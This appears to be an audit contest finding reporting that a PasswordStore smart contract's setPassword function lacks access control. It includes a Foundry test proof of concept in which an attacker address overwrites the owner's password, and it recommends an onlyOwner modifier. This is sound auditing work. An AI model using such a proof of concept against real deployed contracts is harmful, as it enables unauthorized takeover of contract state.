Anyone can set a new password
Summary
Anyone can call setPassword as there is no access control.
Vulnerability Details
There is no validation that the owner is the one calling the setPassword function so anyone can change the password.
Here is a proof of concept for an attacker changing the password:
function test_Attacker_can_set_pasword() public {
//Let owner set the password
vm.startPrank(owner);
string memory ownerPassword = "myNewPassword";
passwordStore.setPassword(ownerPassword);
string memory actualPassword = passwordStore.getPassword();
assertEq(actualPassword, ownerPassword);
vm.stopPrank();
//Now attacker sets the password
vm.startPrank(address(attacker));
string memory attackerPassword = "attacked";
passwordStore.setPassword(attackerPassword);
vm.stopPrank();
//Verify password is now 'attacked'
vm.startPrank(owner);
string memory newPassword = passwordStore.getPassword();
assertEq(newPassword, attackerPassword);
vm.stopPrank();
}
Impact
High
Tools Used
Foundry, Solidity Visual Developer, VS Code
Recommendations
Apply the same validation as getPassword that msg.sender is s_owner. Furthermore, as you will be doing the same check in both functions, it would be better to create an onlyOwner modifier and apply it to both functions.
Lead Judging Commences
finding-lacking-access-control
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.